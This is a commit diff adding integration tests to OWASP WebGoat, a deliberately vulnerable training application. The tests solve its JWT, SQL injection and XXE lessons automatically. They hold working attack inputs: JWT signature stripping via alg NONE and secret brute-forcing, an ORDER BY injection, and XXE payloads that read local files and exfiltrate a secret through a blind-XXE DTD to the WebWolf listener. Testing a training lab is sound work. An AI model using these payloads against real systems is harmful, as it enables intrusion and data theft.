Merge conflicts resolved

2019-09-23 07:34:27 +02:00
parent 261f947777 3ec4592fb2
commit 35c1305ce9
13 changed files with 319 additions and 22 deletions
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
@ -3,6 +3,7 @@ package org.owasp.webgoat;
 import io.restassured.RestAssured;
 import io.restassured.config.RestAssuredConfig;
 import io.restassured.config.SSLConfig;
+import io.restassured.http.ContentType;
 import lombok.Getter;
 import org.hamcrest.CoreMatchers;
 import org.junit.After;
@ -26,7 +27,6 @@ public abstract class IntegrationTest {
    private static String WEBGOAT_URL = "http://127.0.0.1:" + WG_PORT + "/WebGoat/";
    private static String WEBWOLF_URL = "http://127.0.0.1:" + WW_PORT + "/";

-
    //This also allows to test the application with HTTPS when outside testing option is used
    protected static RestAssuredConfig restConfig = RestAssuredConfig.newConfig().sslConfig(new SSLConfig().relaxedHTTPSValidation());

@ -41,16 +41,18 @@ public abstract class IntegrationTest {

    @BeforeClass
    public static void beforeAll() {
-        if (!started) {
+    	    	
+        if (!started) {       
            started = true;
            if (!isAlreadyRunning(WG_PORT)) {
                SpringApplicationBuilder wgs = new SpringApplicationBuilder(StartWebGoat.class)
-                        .properties(Map.of("spring.config.name", "application-webgoat", "WEBGOAT_PORT", WG_PORT));
+                        .properties(Map.of("spring.config.name", "application-webgoat,application-inttest", "WEBGOAT_PORT", WG_PORT));
                wgs.run();
+           
            }
            if (!isAlreadyRunning(WW_PORT)) {
                SpringApplicationBuilder wws = new SpringApplicationBuilder(WebWolf.class)
-                        .properties(Map.of("spring.config.name", "application-webwolf", "WEBWOLF_PORT", WW_PORT));
+                        .properties(Map.of("spring.config.name", "application-webwolf,application-inttest", "WEBWOLF_PORT", WW_PORT));
                wws.run();
            }
        }
@ -209,7 +211,7 @@ public abstract class IntegrationTest {
                .config(restConfig)
                .cookie("JSESSIONID", getWebGoatCookie())
                .get(url("service/lessonoverview.mvc"))
-                .then()
+                .then()                
                .statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true)));

        Assert.assertThat(RestAssured.given()
@ -221,4 +223,20 @@ public abstract class IntegrationTest {
                .statusCode(200).extract().jsonPath().getList("assignment.path"), CoreMatchers.everyItem(CoreMatchers.startsWith(prefix)));

    }
+
+    public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
+        Assert.assertThat(
+                RestAssured.given()
+                        .when()
+                        .config(restConfig)
+                        .contentType(contentType)
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .body(body)
+                        .post(url)
+                        .then()
+                        .statusCode(200)
+                        .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
+    }
+    
 }
+
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
@ -0,0 +1,140 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.nio.charset.Charset;
+import java.security.InvalidKeyException;
+import java.security.NoSuchAlgorithmException;
+import java.time.Instant;
+import java.util.Base64;
+import java.util.Calendar;
+import java.util.Date;
+
+import org.hamcrest.CoreMatchers;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.owasp.webgoat.plugin.JWTSecretKeyEndpoint;
+
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.databind.node.ObjectNode;
+
+import io.jsonwebtoken.Jwt;
+import io.jsonwebtoken.JwtException;
+import io.jsonwebtoken.Jwts;
+import io.jsonwebtoken.SignatureAlgorithm;
+import io.jsonwebtoken.impl.TextCodec;
+import io.restassured.RestAssured;
+
+public class JWTLessonTest extends IntegrationTest {
+
+	@Before
+	public void initTest() {
+		
+	}
+	
+    @Test
+    public void solveAssignment() throws IOException, InvalidKeyException, NoSuchAlgorithmException {
+
+    	startLesson("JWT");
+  
+        resetVotes();
+                
+        findPassword();
+        
+        //        checkResults("/JWT/");
+
+    }
+    
+    private String generateToken(String key) {
+    	
+    	return Jwts.builder()
+		.setIssuer("WebGoat Token Builder")
+		.setAudience("webgoat.org")
+		.setIssuedAt(Calendar.getInstance().getTime())
+		.setExpiration(Date.from(Instant.now().plusSeconds(60)))
+		.setSubject("tom@webgoat.org")
+		.claim("username", "WebGoat")
+		.claim("Email", "tom@webgoat.org")
+		.claim("Role", new String[] {"Manager", "Project Administrator"})
+		.signWith(SignatureAlgorithm.HS256, key).compact();
+    }
+    
+    private String getSecretToken(String token) {
+    	for (String key : JWTSecretKeyEndpoint.SECRETS) {
+    		try {
+    			Jwt jwt = Jwts.parser().setSigningKey(TextCodec.BASE64.encode(key)).parse(token);
+    		} catch (JwtException e) {
+    			continue;
+    		}
+    		return TextCodec.BASE64.encode(key);
+    	}
+    	return null;
+    }
+    
+    private void findPassword() throws IOException, NoSuchAlgorithmException, InvalidKeyException {
+    	
+    	String accessToken = RestAssured.given()
+                .when()
+                .config(restConfig)
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("/WebGoat/JWT/secret/gettoken"))
+                .then()
+                .extract().response().asString();
+    	
+    	String secret = getSecretToken(accessToken);
+    	
+        Assert.assertThat(
+                RestAssured.given()
+                        .when()
+                        .config(restConfig)
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .formParam("token", generateToken(secret))
+                        .post(url("/WebGoat/JWT/secret"))
+                        .then()
+                        .log().all()
+                        .statusCode(200)
+                        .extract().path("lessonCompleted"), CoreMatchers.is(true));
+    	
+    }
+    
+    private void resetVotes() throws IOException {
+    	String accessToken = RestAssured.given()
+                .when()
+                .config(restConfig)
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("/WebGoat/JWT/votings/login?user=Tom"))
+                .then()
+                .extract().cookie("access_token");
+
+        String header = accessToken.substring(0, accessToken.indexOf("."));
+        header = new String(Base64.getUrlDecoder().decode(header.getBytes(Charset.defaultCharset())));
+        
+        String body = accessToken.substring(1+accessToken.indexOf("."), accessToken.lastIndexOf("."));
+        body = new String(Base64.getUrlDecoder().decode(body.getBytes(Charset.defaultCharset())));
+
+        ObjectMapper mapper = new ObjectMapper();
+        JsonNode headerNode = mapper.readTree(header);
+        headerNode = ((ObjectNode) headerNode).put("alg","NONE");
+
+        JsonNode bodyObject = mapper.readTree(body);
+        bodyObject = ((ObjectNode) bodyObject).put("admin","true");
+        
+        String replacedToken = new String(Base64.getUrlEncoder().encode(headerNode.toString().getBytes()))
+        		.concat(".")
+        		.concat(new String(Base64.getUrlEncoder().encode(bodyObject.toString().getBytes())).toString())
+        		.concat(".").replace("=", "");
+        
+        Assert.assertThat(
+                RestAssured.given()
+                        .when()
+                        .config(restConfig)
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .cookie("access_token", replacedToken)
+                        .post(url("/WebGoat/JWT/votings"))
+                        .then()
+                        .statusCode(200)
+                        .extract().path("lessonCompleted"), CoreMatchers.is(true));
+    }
+    
+}
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionMitigationTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionMitigationTest.java
@ -2,6 +2,9 @@ package org.owasp.webgoat;

 import org.junit.Test;

+import io.restassured.RestAssured;
+import io.restassured.http.ContentType;
+
 import java.util.HashMap;
 import java.util.Map;

@ -33,7 +36,18 @@ public class SqlInjectionMitigationTest extends IntegrationTest {
 				"}");
 		checkAssignment(url("/WebGoat/SqlInjectionMitigations/attack10b"), params, true);
 		
-		//checkResults(webGoatCookie, webgoatURL, "/SqlInjectionMitigations/");
+		RestAssured.given()
+		.when().config(restConfig).cookie("JSESSIONID", getWebGoatCookie())
+		.contentType(ContentType.JSON)
+		.get(url("/WebGoat/SqlInjectionMitigations/servers?column=(case when (true) then hostname else id end)"))
+		.then()
+		.statusCode(200);
+
+		params.clear();
+		params.put("ip", "104.130.219.202");
+		checkAssignment(url("/WebGoat/SqlInjectionMitigations/attack12a"), params, true);
+
+		checkResults("/SqlInjectionMitigations/");
 	
 	}
 }
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
@ -0,0 +1,81 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.nio.file.Paths;
+
+import org.junit.Test;
+
+import io.restassured.RestAssured;
+import io.restassured.http.ContentType;
+
+public class XXETest extends IntegrationTest {
+
+    private static final String xxe3 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
+    private static final String xxe4 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
+    private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file:SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURL?text=%file;'>\">%all;";
+    private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>";
+    
+    private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
+    private String webwolfFileDir = System.getProperty("user.dir").concat("/target/webwolf-fileserver");
+    
+    
+    @Test
+    public void runTests() throws IOException {
+        startLesson("XXE");
+        
+        checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
+        
+        checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
+        
+        
+        
+        checkAssignment(url("/WebGoat/xxe/blind"),ContentType.XML,"<comment><text>"+getSecret()+"</text></comment>",true );
+        
+        checkResults("xxe/");
+    
+    }
+    
+    /**
+     * This performs the steps of the exercise before the secret can be committed in the final step.
+     * @return
+     * @throws IOException
+     */
+    private String getSecret() throws IOException {
+    	
+    	//remove any left over DTD
+    	Path webWolfFilePath = Paths.get(webwolfFileDir);
+        if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) {
+        	Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")));
+        }
+        String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt");
+        String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile);
+        
+        //upload DTD
+        RestAssured.given()
+        .when()
+        .config(restConfig)
+        .cookie("WEBWOLFSESSION", getWebWolfCookie())
+        .multiPart("file", "blind.dtd", dtd7String.getBytes())
+        .post(webWolfUrl("/WebWolf/fileupload"))
+        .then()
+        .extract().response().getBody().asString();
+        
+        //upload attack
+        String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", getWebgoatUser());
+        checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false );
+        
+        //read results from WebWolf
+        String result = RestAssured.given()
+        .when()
+        .config(restConfig)
+        .cookie("WEBWOLFSESSION", getWebWolfCookie())
+        .get(webWolfUrl("/WebWolf/requests"))
+        .then()
+        .extract().response().getBody().asString();
+        result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("),result.lastIndexOf("WebGoat 8.0 rocks... (")+33);
+        return result;
+    }
+    
+}